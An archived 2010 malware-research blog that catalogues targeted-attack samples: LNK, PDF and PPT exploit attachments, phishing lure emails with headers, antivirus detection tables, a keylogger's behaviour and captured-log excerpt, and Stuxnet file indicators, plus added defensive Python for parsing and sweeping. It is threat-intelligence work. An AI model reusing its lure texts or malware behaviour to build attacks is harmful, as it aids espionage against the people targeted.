Friday, July 30, 2010

CVE-2010-2568 keylogger Win32/Chymine.A

CVE-2010-2568 - Win32/Chymine.A
Windows Shell in Microsoft Windows XP SP3, Server 2003 SP2, Vista SP1 and SP2, Server 2008 SP2 and R2, and Windows 7 allows local users or remote attackers to execute arbitrary code via a crafted (1) .LNK or (2) .PIF shortcut file, which is not properly handled during icon display in Windows Explorer, as demonstrated in the wild in July 2010, and originally reported for malware that leverages CVE-2010-2772 in Siemens WinCC SCADA systems.

Credit for this post goes to Extraexploit; see additional details on his blog.

Download bin.exe as a password protected archive (contact me if you need the password)

ESET New malicious LNKs: here we go…
"At the time of analysis, this threat downloads and install a key stroke logger which we detect as Win32/Spy.Agent.NSO trojan.  The server used to deliver the components used in this attack is presently located in the US, but the IP is assigned to a customer in China. "

F-Secure Win32/Chymine-A

Result: 30/41 (73.18%)
Antivirus Version Last Update Result
AhnLab-V3 2010.07.30.00 2010.07.29 Dropper/Win32.Chymine
AntiVir 2010.07.30 TR/Dldr.Tiny.cmq
Antiy-AVL 2010.07.30 Trojan/Win32.Tiny.gen
Avast 4.8.1351.0 2010.07.30 Win32:Malware-gen
Avast5 5.0.332.0 2010.07.30 Win32:Malware-gen
AVG 2010.07.30 PSW.Generic8.GRF
BitDefender 7.2 2010.07.30 Trojan.Autorun.ATB
Comodo 5586 2010.07.30 TrojWare.Win32.AntiAV.~G
DrWeb 2010.07.30 Trojan.KeyLogger.8141
Emsisoft 2010.07.30 Trojan-Downloader.Win32.Tiny!IK
F-Secure 9.0.15370.0 2010.07.30 Trojan-Spy:W32/Chymine.A
Fortinet 2010.07.30 W32/Tiny.CMQ!tr.dldr
GData 21 2010.07.30 Trojan.Autorun.ATB
Ikarus T3. 2010.07.30 Trojan-Downloader.Win32.Tiny
Jiangmin 13.0.900 2010.07.29 TrojanSpy.KeyLogger.cqyg
Kaspersky 2010.07.30 Trojan-Downloader.Win32.Tiny.cmq
McAfee 5.400.0.1158 2010.07.30 Generic Downloader.x!eas
McAfee-GW-Edition 2010.1 2010.07.30 Heuristic.BehavesLike.Win32.CodeInjection.H
Microsoft 1.6004 2010.07.30 Trojan:Win32/Chymine.A
NOD32 5325 2010.07.30 Win32/Spy.Agent.NSO
nProtect 2010-07-30.02 2010.07.30 Trojan.Autorun.ATB
Panda 2010.07.29 Trj/ChymineLNK.A
PCTools 2010.07.30 Net-Worm.SillyFDC
Rising 2010.07.30 Trojan.Win32.Generic.52214029
Sophos 4.56.0 2010.07.30 Mal/Chymin-A
Sunbelt 6663 2010.07.30 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.07.30 W32.SillyFDC
VBA32 2010.07.30 Trojan-Downloader.Tiny.cmq
ViRobot 2010.7.30.3963 2010.07.30 Trojan.Win32.S.Downloader.131584
VirusBuster 2010.07.29 Trojan.DL.Tiny.DPT
Additional information
File size: 131584 bytes
MD5...: 3515b1f2ae991fcd64ff4e3b664625c0
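Detection names like the ones in the table above are easier to work with once they are parsed into records: vendor rows carry an optional version column, and a few rows on this page have hand-written notes after the name. The following Python is an added example, not code from this post. It anchors each row on the YYYY.MM.DD last-update field, splits off a trailing " - note" annotation, and counts how many vendors agree on a family-like token; the list of generic tokens it ignores is my own choice. The sample rows are copied from the table above.

```python
"""Normalise a VirusTotal-style text results table (added example)."""
import re
from collections import Counter

DATE_RE = re.compile(r"^\d{4}\.\d{2}\.\d{2}$")       # the 'last update' column
SUMMARY_RE = re.compile(r"Result:\s*(\d+)\s*/\s*(\d+)")

# Category words that never name a family; ignored when counting votes.
# This list is my own choice, extend it as new vendors appear.
GENERIC = {
    "trojan", "trojware", "trojanspy", "win32", "w32", "winnt", "generic",
    "gen", "downloader", "dldr", "dropper", "drop", "agent", "heuristic",
    "behaveslike", "lookslike", "malware", "spy", "variant", "probably",
    "application", "exploit", "pdf", "js", "ppt", "hacktool", "backdoor",
    "bds", "rootkit", "worm", "net", "mal", "troj", "trj", "keylogger",
    "psw", "pua", "packed", "cve", "suspicious",
}

def parse_row(line):
    """Split one vendor row into a dict, or return None for non-rows.

    The version column is optional, so the row is anchored on the
    'last update' token, which always looks like 2010.07.30.
    """
    tokens = line.split()
    date_idx = next((i for i, t in enumerate(tokens) if DATE_RE.match(t)), None)
    if not date_idx or date_idx == len(tokens) - 1:
        return None
    result = " ".join(tokens[date_idx + 1:])
    note = None
    if " - " in result:                       # hand-written annotation
        result, note = (s.strip() for s in result.split(" - ", 1))
    return {
        "vendor": tokens[0],
        "version": " ".join(tokens[1:date_idx]) or None,
        "last_update": tokens[date_idx],
        "result": result,
        "note": note,
    }

def parse_table(text):
    """Return ((detections, engines) or None, [row dicts])."""
    summary, rows = None, []
    for line in text.splitlines():
        m = SUMMARY_RE.search(line)
        if m:
            summary = (int(m.group(1)), int(m.group(2)))
            continue
        row = parse_row(line)
        if row:
            rows.append(row)
    return summary, rows

def family_votes(rows):
    """Count how many vendors used each family-like token in their name."""
    votes = Counter()
    for row in rows:
        tokens = re.split(r"[^A-Za-z0-9]+", row["result"])
        candidates = {t.lower() for t in tokens
                      if len(t) >= 3 and not t.isdigit() and t.lower() not in GENERIC}
        votes.update(candidates)            # one vote per vendor per token
    return votes

# Rows copied from the Win32/Chymine.A table above.
SAMPLE = """\
Result: 30/41 (73.18%)
Antivirus Version Last Update Result
AhnLab-V3 2010.07.30.00 2010.07.29 Dropper/Win32.Chymine
AntiVir 2010.07.30 TR/Dldr.Tiny.cmq
Antiy-AVL 2010.07.30 Trojan/Win32.Tiny.gen
BitDefender 7.2 2010.07.30 Trojan.Autorun.ATB
F-Secure 9.0.15370.0 2010.07.30 Trojan-Spy:W32/Chymine.A
Kaspersky 2010.07.30 Trojan-Downloader.Win32.Tiny.cmq
McAfee-GW-Edition 2010.1 2010.07.30 Heuristic.BehavesLike.Win32.CodeInjection.H
Microsoft 1.6004 2010.07.30 Trojan:Win32/Chymine.A
Panda 2010.07.29 Trj/ChymineLNK.A
VirusBuster 2010.07.29 Trojan.DL.Tiny.DPT
Additional information
File size: 131584 bytes
"""

if __name__ == "__main__":
    summary, rows = parse_table(SAMPLE)
    print("detections:", summary, "rows:", len(rows))
    for token, n in family_votes(rows).most_common(3):
        print(f"{n:2d} vendors mention {token}")
```

On the sample, "tiny" collects more votes than "chymine", which matches the names in the table: most engines filed this as the Tiny downloader and only a few used the Chymine name the post is titled after.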

Thursday, July 29, 2010

Jul 29 CVE-2010-0188 PDF Defense New Thinks

CVE-2010-0188 Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors

Download 5e0e5951ca4626a891344e38e0085d58 Defense_Attache.pdf as a password protected archive (please contact me for the password if you need it)

From: Gillian Medina []
Sent: Thursday, July 29, 2010 4:31 AM
Subject: Defense New Thinks

Defense New Thinks 

File Defense_Attache.pdf received on 2010.08.02 03:25:36 (UTC)
Result: 11/42 (26.2%)
Antiy-AVL    2010.08.02    Exploit/Win32.Pidief
Avast    4.8.1351.0    2010.08.02    PDF:CVE-2010-0188
Avast5    5.0.332.0    2010.08.02    PDF:CVE-2010-0188
DrWeb    2010.08.02    Exploit.PDF.1046
eTrust-Vet    36.1.7753    2010.07.31    PDF/CVE-2010-0188!exploit
GData    21    2010.08.02    PDF:CVE-2010-0188
Ikarus    T3.    2010.08.02    Exploit.Win32.Pidief
Kaspersky    2010.08.02    Exploit.Win32.Pidief.dci
McAfee-GW-Edition    2010.1    2010.08.01    Heuristic.BehavesLike.PDF.Suspicious.L
NOD32    5331    2010.08.01    a variant of PDF/CVE-2010-0188
Sophos    4.56.0    2010.08.02    Troj/PDFJs-II
Additional information
File size: 73708 bytes
MD5...: 5e0e5951ca4626a891344e38e0085d58

Received: from SNT133-W12 ([]) by with Microsoft SMTPSVC(6.0.3790.4675);
     Thu, 29 Jul 2010 01:31:18 -0700
Content-Type: multipart/mixed;
X-Originating-IP: []
From: Gillian Medina
Subject: Defense New Thinks
Date: Thu, 29 Jul 2010 01:31:18 -0700
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 29 Jul 2010 08:31:18.0425 (UTC) FILETIME=[6A87E890:01CB2EF8]

ISP:    China Unicom Liaoning province network
Organization:    China Unicom Liaoning province network
Type:    Broadband
Assignment:    Static IP
State/Region:    Liaoning
City:    Shenyang

This IP is on many blacklists

Wednesday, July 28, 2010

Jul 28 CVE-2009-4324 PDF 990729 Summary of Network Intelligence from

Download 738af108a6edd46536492b1782589a04 -990729.pdf as a password protected archive (contact me if you need the password)

From: ljw []
Sent: Wednesday, July 28, 2010 11:24 PM
Subject: 990729網情彙編 (990729 Summary of Network Intelligence)


Received: from (HELO (
Received: from
    by with Mail2000 ESMTP Server V4.00S(4662:0:AUTH_LOGIN)
    (envelope-from ); Thu, 29 Jul 2010 17:28:08 +0800 (CST)
Message-ID: <1975e5623c$23fce32a$0ae1d8b4@nccu212af2ce2>
From: "ljw"
To: ,
Subject: =?big5?B?OTkwNzI5uvSxobdKvXM=?=
Date: Thu, 29 Jul 2010 11:24:22 +0800
MIME-Version: 1.0
Content-Type: multipart/mixed;
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.3138
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.5579
ISP:    GSN, Taiwan Government Service Network.
Organization:    Taichung City Government
Country:    Taiwan

File name:
Submission date: 2010-07-30 05:36:27 (UTC)
Result: 12/42 (28.6%)
Authentium     2010.07.30     JS/Pdfka.V
Avast     4.8.1351.0     2010.07.30     JS:Pdfka-gen
Avast5     5.0.332.0     2010.07.30     JS:Pdfka-gen
AVG     2010.07.29     Exploit.PDF
BitDefender     7.2     2010.07.30     Exploit.PDF-JS.Gen
eTrust-Vet     36.1.7750     2010.07.30     PDF/CVE-2010-1297.B!exploit  - NOT
F-Prot     2010.07.30     JS/Pdfka.V
F-Secure     9.0.15370.0     2010.07.30     Exploit.PDF-JS.Gen
GData     21     2010.07.30     Exploit.PDF-JS.Gen
McAfee-GW-Edition     2010.1     2010.07.29     Heuristic.BehavesLike.PDF.Suspicious.O
Norman     6.05.11     2010.07.29     JS/Shellcode.IZ
nProtect     2010-07-30.01     2010.07.30     Exploit.PDF-JS.Gen
Additional information
MD5   : 738af108a6edd46536492b1782589a04

Windows XP SP2 Adobe Reader 9.1

Files created:


AntiVir 2010.08.25 BDS/Ixeshe.A.20
Authentium 2010.08.26 W32/Heuristic-245!Eldorado
Avast 4.8.1351.0 2010.08.25 Win32:Rootkit-gen
Avast5 5.0.594.0 2010.08.25 Win32:Rootkit-gen
BitDefender 7.2 2010.08.26 Trojan.Generic.4549982
CAT-QuickHeal 11.00 2010.08.24 Backdoor.Ixeshe.a
ClamAV 2010.08.26 PUA.Packed.ASPack
Emsisoft 2010.08.26 Backdoor.Win32.Ixeshe!IK
F-Prot 2010.08.26 W32/Heuristic-245!Eldorado
F-Secure 9.0.15370.0 2010.08.26 Trojan.Generic.4549982
Fortinet 2010.08.25 W32/PdfExDr.B!tr
GData 21 2010.08.26 Trojan.Generic.4549982
Ikarus T3. 2010.08.26 Backdoor.Win32.Ixeshe
Microsoft 1.6103 2010.08.25 Backdoor:Win32/Ixeshe.A
NOD32 5397 2010.08.25 probably a variant of Win32/Ixeshe.A
nProtect 2010-08-25.02 2010.08.25 Trojan.Generic.4549982
Panda 2010.08.25 Trj/CI.A
PCTools 2010.08.26 Trojan.Gen
Sophos 4.56.0 2010.08.26 Mal/PdfExDr-B
Sunbelt 6795 2010.08.26 Trojan.Win32.Generic!BT
Symantec 20101.1.1.7 2010.08.26 Trojan.Gen
TrendMicro 2010.08.26 TSPY_AGENT.AVEP
TrendMicro-HouseCall 2010.08.26 TSPY_AGENT.AVEP
VBA32 2010.08.25 Trojan-Downloader.Dreamtouch.xb
VirusBuster 2010.08.25 Trojan.Ixeshe.Z
Additional information
MD5   : d27e5643f1e5422be6cba2d98506ebbf
ISP:    Ministry of Education Computer Center
Organization:    Ministry of Education Computer Center
Country:    Taiwan

  • Outgoing Connections

    • HTTP Data

      • Method: GET
      • Url:
      • HTTP Version: HTTP/1.1

        • Header Data

          • x_bigfix_client_string: 2al314Le1g0315QgjaZ/qDAA
          • User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
          • Host:
          • Connection: Keep-Alive

Incoming mail for is handled by one mail server at has one IP number ( , but the reverse points to the same IP. use this as a mail server. is a domain controlled by three name servers at Two of them are on the same IP network. The primary name server is Incoming mail for is handled by one mail server at has one IP number (

More information is hosted on a server in Taiwan

Transport Protocol: TCP
Remote Address:
Remote Port: 80
Protocol: HTTP
Connection Established: 0
Socket: 2020

ISP:    National Taiwan University
Organization:    National Taiwan University
Country:    Taiwan

Tuesday, July 27, 2010

APT Activity Monitor / keylogger

Here is a small piece of APT-type malware which records all user activity and keystrokes, including passwords. The attacker needs to execute it; it then creates a hidden folder named mssvr in the same directory and, inside it, a text log file called UpdaterInfo.dat. The log can be sent or downloaded later by other means (look for a file named send1.exe, for example - never mind, send1.exe does not appear to have any sending abilities). There are usually many other files associated with the attack: backdoors, miscellaneous installers, command interpreters, etc. The Anubis report is brief and clear; see it posted below in full. The binary and the mssvr folder can be anywhere, in some temp folder for example.
Log file: mssvr\UpdaterInfo.dat

Fixed the archive, re-download it if you could not open it before
Download dc281590aa9153000e983622f0559ea1 Adobeinfo.exe as a password protected archive (please contact me for the password if you need it)
Two name variants known (but there can be an endless list) are Adobeinfo.exe and lognoreg.exe.

File AdobeInfo.exe received on 2010.07.25 05:11:45 (UTC)
Current status: finished
Result: 0/42 (0.00%)
Additional information
File size: 16384 bytes
MD5   : dc281590aa9153000e983622f0559ea1

Example of an UpdaterInfo.dat log from the mssvr folder; note the way passwords are captured, at the bottom of this log.

--- 20100727 13:07:47 ----------------
11:06:47 The Active Windows Title: PC21330
11:06:03 The Active Windows Title: Inbox - Microsoft Outlook
11:06:05 The Active Windows Title: RE: Meeting tomorrow : Budget 2011- Message (HTML)
Let's meet before the meeting, maybe around 3 pm today. By the way I am still waiting for Brian's reply, he never called me back, do you have his secretary's number?

11:06:48 The Active Windows Title: Microsoft Access - Events_Records : Database (Access 2000 file format)
I will send you the agenda in a minute
11:06:55 The Active Windows Title: Find and Replace
July 23
11:06:07 The Active Windows Title: Find and Replace
12:06:37 The Active Windows Title: Microsoft Excel - InvitationListDetails.xlsx
12:06:06 The Active Windows Title: Microsoft Excel - invoicelist.xlsx
12:06:10 The Active Windows Title: Microsoft Excel - invoicelist.xlsx.xlsx
12:06:11 The Active Windows Title: Save As
12:06:15 The Active Windows Title: Microsoft Excel - InvidtationListDetails
12:06:56 The Active Windows Title: \\FILESRV002\DATA\DEPARTMENTS\STRATCMD-S
12:06:27 The Active Windows Title: Windows Internet Explorer
Taxi 20006
12:06:52 The Active Windows Title: taxi phone number zip code 20001 - Google Search - Microsoft Internet Explorer
12:06:04 The Active Windows Title: @@To Do list - Microsoft Outlook
oil production
12:06:10 The Active Windows Title: Untitled - Message (Plain Text)
12:06:16 The Active Windows Title: Amanda Smith
12:06:56 The Active Windows Title: Untitled - Message (Plain Text)
15:06:36 The Active Windows Title: Google - Microsoft Internet Explorer

Or this is from a VM

Some strings

[Num Lock]
[Scroll Lock]
[Print Screen]
---- %04d%02d%02d %02d:%02d:%02d ----------------
The Active Windows Title: %s
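Responders who recover an UpdaterInfo.dat log usually want two things from it quickly: which credential prompts were active while keys were being logged (those accounts need resetting) and which documents and network shares the victim touched in front of the attacker. The Python below is an added example, not the author's or the malware's code. It parses the session header produced by the format string shown above and the per-window entries, using a constructed log fragment modelled on the excerpt (the logon line is made up); the list of credential-prompt window titles is an assumption to adapt per environment.

```python
"""Triage an UpdaterInfo.dat-style keystroke log (added example)."""
import re
from dataclasses import dataclass, field

# Session header written by "---- %04d%02d%02d %02d:%02d:%02d ----";
# the excerpt above shows three leading dashes, so accept three or more.
HEADER_RE = re.compile(r"^-{3,}\s+(\d{8})\s+(\d{2}:\d{2}:\d{2})\s+-{3,}\s*$")
TITLE_RE = re.compile(r"^(\d{2}:\d{2}:\d{2}) The Active Windows Title: (.*)$")
UNC_RE = re.compile(r"\\\\[\w.-]+\\\S+")
# Window titles that usually precede typed credentials (assumption: adapt
# this to the logon prompts, VPN clients and web apps in your environment).
CREDENTIAL_TITLES = ("log on", "logon", "sign in", "password", "windows security")

@dataclass
class Entry:
    time: str
    title: str
    typed: str = ""        # everything typed while this window was active

@dataclass
class Session:
    date: str
    started: str
    entries: list = field(default_factory=list)

def parse_log(text):
    """Group the log into sessions, each a list of window entries."""
    sessions, current = [], None
    for line in text.splitlines():
        m = HEADER_RE.match(line)
        if m:
            current = Session(date=m.group(1), started=m.group(2))
            sessions.append(current)
            continue
        m = TITLE_RE.match(line)
        if m:
            if current is None:              # fragment without a header
                current = Session(date="unknown", started="unknown")
                sessions.append(current)
            current.entries.append(Entry(time=m.group(1), title=m.group(2)))
            continue
        if current and current.entries and line.strip():
            entry = current.entries[-1]
            entry.typed = f"{entry.typed}\n{line}" if entry.typed else line
    return sessions

def credential_entries(sessions):
    """Entries where keys were typed into a credential-looking window."""
    return [e for s in sessions for e in s.entries
            if e.typed and any(k in e.title.lower() for k in CREDENTIAL_TITLES)]

def referenced_paths(sessions):
    """UNC paths seen in titles or typed text: shares the attacker learned of."""
    paths = set()
    for s in sessions:
        for e in s.entries:
            paths.update(UNC_RE.findall(e.title))
            paths.update(UNC_RE.findall(e.typed))
    return sorted(paths)

# Constructed fragment modelled on the excerpt above; the logon line is made up.
SAMPLE_LOG = """\
--- 20100727 13:07:47 ----------------
11:06:03 The Active Windows Title: Inbox - Microsoft Outlook
11:06:05 The Active Windows Title: RE: Meeting tomorrow : Budget 2011- Message (HTML)
Let's meet before the meeting, maybe around 3 pm today.
12:06:56 The Active Windows Title: \\\\FILESRV002\\DATA\\DEPARTMENTS\\STRATCMD-S
12:06:27 The Active Windows Title: Windows Internet Explorer
Taxi 20006
--- 20100728 08:15:02 ----------------
08:15:10 The Active Windows Title: Log On to Windows
jdoe[Tab]Summer2010![Enter]
08:16:40 The Active Windows Title: Google - Microsoft Internet Explorer
"""

if __name__ == "__main__":
    sessions = parse_log(SAMPLE_LOG)
    print(len(sessions), "sessions")
    for e in credential_entries(sessions):
        print("reset credentials typed into:", e.title, "at", e.time)
    print("shares referenced:", referenced_paths(sessions))
```

The typed text is kept per window rather than as one stream because the log's own structure is the window title followed by whatever was typed until the next title line; that is also why the credential check keys on the title and not on the keystrokes themselves.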

Unicode Strings:

Anubis Report

    2. AdobeInfo..exe
    General information about this executable
        Analysis Reason: Primary Analysis Subject
        Filename:        AdobeInfo..exe
        MD5:             dc281590aa9153000e983622f0559ea1
        SHA-1:           9945f8bf55a81b0e201fad167577d49b37079bd4
        File Size:       16384 Bytes
        Command Line:    "C:\AdobeInfo..exe" 
        at analysis end: alive
        Exit Code:       0

    Load-time Dlls
        Module Name: [ C:\WINDOWS\system32\ntdll.dll ],
               Base Address: [0x7C900000 ], Size: [0x000AF000 ]
        Module Name: [ C:\WINDOWS\system32\kernel32.dll ],
               Base Address: [0x7C800000 ], Size: [0x000F6000 ]
        Module Name: [ C:\WINDOWS\system32\USER32.dll ],
               Base Address: [0x7E410000 ], Size: [0x00091000 ]
        Module Name: [ C:\WINDOWS\system32\GDI32.dll ],
               Base Address: [0x77F10000 ], Size: [0x00049000 ]
        Module Name: [ C:\WINDOWS\system32\MSVCRT.dll ],
               Base Address: [0x77C10000 ], Size: [0x00058000 ]

    2.a) AdobeInfo..exe - Registry Activities
    Registry Values Read:
        Key: [ HKLM\System\CurrentControlSet\Control\Terminal Server ], 
             Value Name: [ TSAppCompat ], Value: [ 0 ], 2 times

    2.b) AdobeInfo..exe - File Activities
    Files Created:
        File Name: [ C:\mssvr ]
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

    Files Read:
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

    Files Modified:
        File Name: [ C:\mssvr\UpdaterInfo.dat ]

    Directories Created:
        Directory: [ C:\\mssvr ]

    2.c) AdobeInfo..exe - Other Activities
    Keyboard Keys Monitored:
        Virtual Key Code: [ VK_SHIFT (16) ], 70585 times
        Virtual Key Code: [ VK_BACK (8) ], 743 times
        Virtual Key Code: [ VK_RETURN (13) ], 743 times
        Virtual Key Code: [ VK_ESCAPE (27) ], 743 times
        Virtual Key Code: [ VK_F1 (112) ], 743 times
        Virtual Key Code: [ VK_F2 (113) ], 743 times
        Virtual Key Code: [ VK_F3 (114) ], 743 times
        Virtual Key Code: [ VK_F4 (115) ], 743 times
        Virtual Key Code: [ VK_F5 (116) ], 743 times
        Virtual Key Code: [ VK_F6 (117) ], 743 times
        Virtual Key Code: [ VK_F7 (118) ], 743 times
        Virtual Key Code: [ VK_F8 (119) ], 743 times
        Virtual Key Code: [ VK_F9 (120) ], 743 times
        Virtual Key Code: [ VK_F10 (121) ], 743 times
        Virtual Key Code: [ VK_F11 (122) ], 743 times
        Virtual Key Code: [ VK_F12 (123) ], 743 times
        Virtual Key Code: [ VK_OEM_3 (192) ], 743 times
        Virtual Key Code: [ VK_1 (49) ], 743 times
        Virtual Key Code: [ VK_2 (50) ], 743 times 

Saturday, July 24, 2010

Advanced Persistent Threat / Targeted Attacks / APT Malware links

Here is a collection of links about Advanced Persistent Threat malware and attacks. I think I missed a few hundred, please send more. Thanks, Mila

Specific malware families and trojans
Stuxnet, Duqu, Flame, Gauss ..

OLD(ER) 2010 and before

SHADOWS IN THE CLOUD: Investigating Cyber Espionage 2.0 Report
Shadows in the Cloud: An investigation into cyber espionage 2.0
Cyber Espionage: Death by 1000 Cuts

The Advanced Persistent Threat (or Informationized Force Operations) Michael K. Daly

Combat the APT by Sharing Indicators of Compromise
Malware Behaving Badly: Preview

Blackhat Europe, State Of Malware: Family Ties

Advanced Persistent Threat Report

The Hackers Behind Stuxnet  Patrick Fitzgerald

SANS computer forensics
Security Intelligence: Introduction (pt 1)
Security Intelligence: Introduction (pt 2)
Security Intelligence: Attacking the Kill Chain
Security Intelligence: Defining APT Campaigns

Digital Bond
Trojan Targeting Siemens and APT Thoughts  Dale Peterson   IT--Harvest
35 Steps to Protect Yourself from Cyber Espionage Richard Stiennon

Project Grey Goose
Project Grey Goose: Phase I Report
Project Grey Goose Phase II Report: The evolving state of cyber warfare

Information Security
Understanding the advanced persistent threat Richard Bejtlich 

HBGary, Inc.
Advanced Persistent Threat What APT Means to Your Enterprise Greg Hoglund

Cassandra Security
All Advanced Persistent Threat articles

All Advanced Persistent Threat articles 

A new approach to China 

You Down with APT? Richard Bejtlich
All Advanced Persistent Threat articles

Johnny Cocaine Internet Cowboy
Losing the cyberwar

MadMark's Blog
Google / Adobe Hacking Event Follow-up – APT Malware

ViCheck Malware Trends
APT Malware Trends

Advanced Persistent Threat (APT)

Infowar Monitor
All Articles about espionage

Lab Matters: Inside Targeted Attacks

Trojan Hydraq exposed



Wednesday, July 21, 2010

Jul 15 CVE-2009-0556 PPT North Korean Nuclear Update from

Download  Nuclear_report.pps 71803d893ed7d052fdb58f10da200fe9 as a password protected archive (contact me if you need the password)

From: David Alton []
Sent: Thursday, July 15, 2010 4:03 AM
To: xxxxxxxxxx
Subject: North Korean Nuclear Update.

Recently U.S Secretary of State Hillary Clinton has said North
Korea as many as six nuclear weapons.
Attached please find Koreatimes`s article about North Korea`s
Nuclear issue...   I believe it could be of your interest and helpful for reviewing
the NK Nuclear activities.
Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.

 File Nuclear_report.pps received on 2010.07.21 11:33:22 (UTC)
Result: 11/42 (26.2%)
BitDefender    7.2    2010.07.21    Exploit.PPT.Gen
Emsisoft    2010.07.21    Exploit.MSPPoint.Agent!IK
F-Secure    9.0.15370.0    2010.07.21    Exploit.PPT.Gen
GData    21    2010.07.21    Exploit.PPT.Gen
Ikarus    T3.    2010.07.21    Exploit.MSPPoint.Agent
Kaspersky    2010.07.21    Exploit.MSPPoint.Agent.x
McAfee-GW-Edition    2010.1    2010.07.21    Heuristic.BehavesLike.Exploit.P97.CodeExec.PGPG
Norman    6.05.11    2010.07.20    ShellCode.D
nProtect    2010-07-21.01    2010.07.21    Exploit.PPT.Gen
Sophos    4.55.0    2010.07.21    Troj/ExpPPT-A
TrendMicro-HouseCall    2010.07.21    HEUR_OLEXP.B
Additional information
File size: 838144 bytes
MD5...: 71803d893ed7d052fdb58f10da200fe9

X-Originating-IP: []
From: David Alton
To: xxxxxxxxxxxx
Subject: North Korean Nuclear Update.
Date: Thu, 15 Jul 2010 20:03:21 +1200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 15 Jul 2010 08:03:21.0286 (UTC) FILETIME=[31184E60:01CB23F4]

ISP:    City Telecom (H.K.) Ltd.
Organization:    City Telecom (H.K.) Ltd.
Type:    Broadband
Assignment:    Static IP
Country:    Hong Kong
City:    Tin Shui Wai

Sunday, July 18, 2010

CVE-2010-2568 (LNK vulnerability) Zero Day Stuxnet-A Sample + PoC by Ivanlef0u + Links

CVE-2010-2568  -- Reserved --
Microsoft Security Advisory (2286198) Microsoft is investigating reports of limited, targeted attacks exploiting a vulnerability in Windows Shell, a component of Microsoft Windows. This advisory contains information about which versions of Windows are vulnerable as well as workarounds and mitigations for this issue.
The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited. For Windows 7 systems, AutoPlay functionality for removable disks is automatically disabled.

Download 74ddc49a7c121a61b8d06c03f92d0c13 Stuxnet-A as a password protected archive (please contact me for the password if you need it)

Collection of links (in no particular order)
  1. Ivanlef0u's Blog CVE-2010-2568 shortcut Lnk + PoC (Google translated to English)
  2. Exploitdb Microsoft Windows Automatic LNK Shortcut File Code Execution (PoC by Ivanlef0u)
  3. Microsoft Security Advisory (2286198) Vulnerability in Windows Shell Could Allow Remote Code Execution
  4. Brian Krebs Experts Warn of New Windows Shortcut Flaw
  5. InReverse  About TmpHider/Stuxnet #1 by swirl
  6. Wilders Security Forums - Rootkit.TmpHider
  7. Microsoft Malware Protection Center - The Stuxnet Sting
  8. Microsoft Malware Protection Center - WinNT/Stuxnet.A
  9. Threatexpert - Win32/Stuxnet.A
  10. ESET (Windows) Shellshocked, Or Why Win32/Stuxnet Sux… by David Harley (with special thanks to Juraj Malcho, Aleksander Matrosov and their colleagues)
  11. Aleksander Matrosov "Rootkit.TmpHider is signed with signature of Realtek Corp" /via @_MDL_
  12. Sophos Windows shortcut vulnerability with rootkit - detailed video demo 
  13. Mitigating .LNK Exploitation With Ariad — Didier Stevens 
  14. Internet Storm Center Vulnerability in Windows "LNK" files?  by Joel Esler and Bojan
  15. Windows zero-day attack works on all Windows systems by Chester Wisniewski
  16. Stuxnet is a directed attack -- 'hack of the century' by Ralph Langner (new)

From Threatexpert
  * The following files were created in the system:

1. %Windir%\inf\mdmcpq3.PNF, 6,623 bytes
   MD5: 0x0DD2AF5AFE93118073CB656D813435A4
   SHA-1: 0x256AC5228427FCD03FB9EC1871B15FD76E4D0879
   Alias: (not available)

2. %Windir%\inf\mdmeric3.PNF, 90 bytes
   SHA-1: 0xF7B86531AD78EB283E59091A1C64B0C47D50E6C6
   Alias: (not available)

3. %Windir%\inf\oem6C.PNF, 323,848 bytes
   MD5: 0xFA4381DF1F7F89077439A596630D5647
   SHA-1: 0x152B6830777E7F2B214708A21BA28F9D625E5E16
   Alias: (not available)

4. %Windir%\inf\oem7A.PNF, 498,176 bytes
   SHA-1: 0xBCFCC25C6D0F58D784D5B5A4C631E920F655F50E
   Alias: (not available)

5. %System%\drivers\mrxcls.sys, 26,616 bytes
   MD5: 0xF8153747BAE8B4AE48837EE17172151E
   SHA-1: 0xCB0793029C60C0BD059FF85DE956619F7FDEB4FD
   Alias: Trojan:WinNT/Stuxnet.A [Microsoft]

6. %System%\drivers\mrxnet.sys, 17,400 bytes
   MD5: 0xCC1DB5360109DE3B857654297D262CA1
   SHA-1: 0x758240613C362BB1FD13E07D3D19F357B7F8A6DA
   Alias: Trojan:WinNT/Stuxnet.B [Microsoft]

7. [file and pathname of the sample #1], 517,632 bytes
   MD5: 0x74DDC49A7C121A61B8D06C03F92D0C13
   SHA-1: 0x0CCBC128DD8BF73DC7B3922FB67D26BBCDBCAA89
   Alias: Trojan.Gen [PCTools], Trojan.Gen [Symantec], TrojanDropper:Win32/Stuxnet.A [Microsoft]
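The dropped-file list above is a ready-made checklist for an offline image or a live volume. The Python below is an added example, not Threatexpert's or the author's code. It carries those paths and hashes as data, expands %Windir% and %System% against a chosen root (the Windows directory name is a parameter, since Windows 2000 used Winnt), resolves names case-insensitively for NTFS images mounted on Linux, and reports each indicator as absent, present with a different hash, or confirmed. build_demo_volume() creates a throwaway directory tree with an empty placeholder mrxcls.sys so the sweep can be exercised without a real sample.

```python
"""Sweep a Windows volume or mounted image for the Stuxnet dropped files (added example)."""
import hashlib
import os
import re
import tempfile

# Dropped-file indicators copied from the Threatexpert list above; items 2
# and 4 were published with a SHA-1 only, so they carry no md5 key.
STUXNET_FILES = [
    {"path": r"%Windir%\inf\mdmcpq3.PNF", "size": 6623,
     "md5": "0x0DD2AF5AFE93118073CB656D813435A4",
     "sha1": "0x256AC5228427FCD03FB9EC1871B15FD76E4D0879"},
    {"path": r"%Windir%\inf\mdmeric3.PNF", "size": 90,
     "sha1": "0xF7B86531AD78EB283E59091A1C64B0C47D50E6C6"},
    {"path": r"%Windir%\inf\oem6C.PNF", "size": 323848,
     "md5": "0xFA4381DF1F7F89077439A596630D5647",
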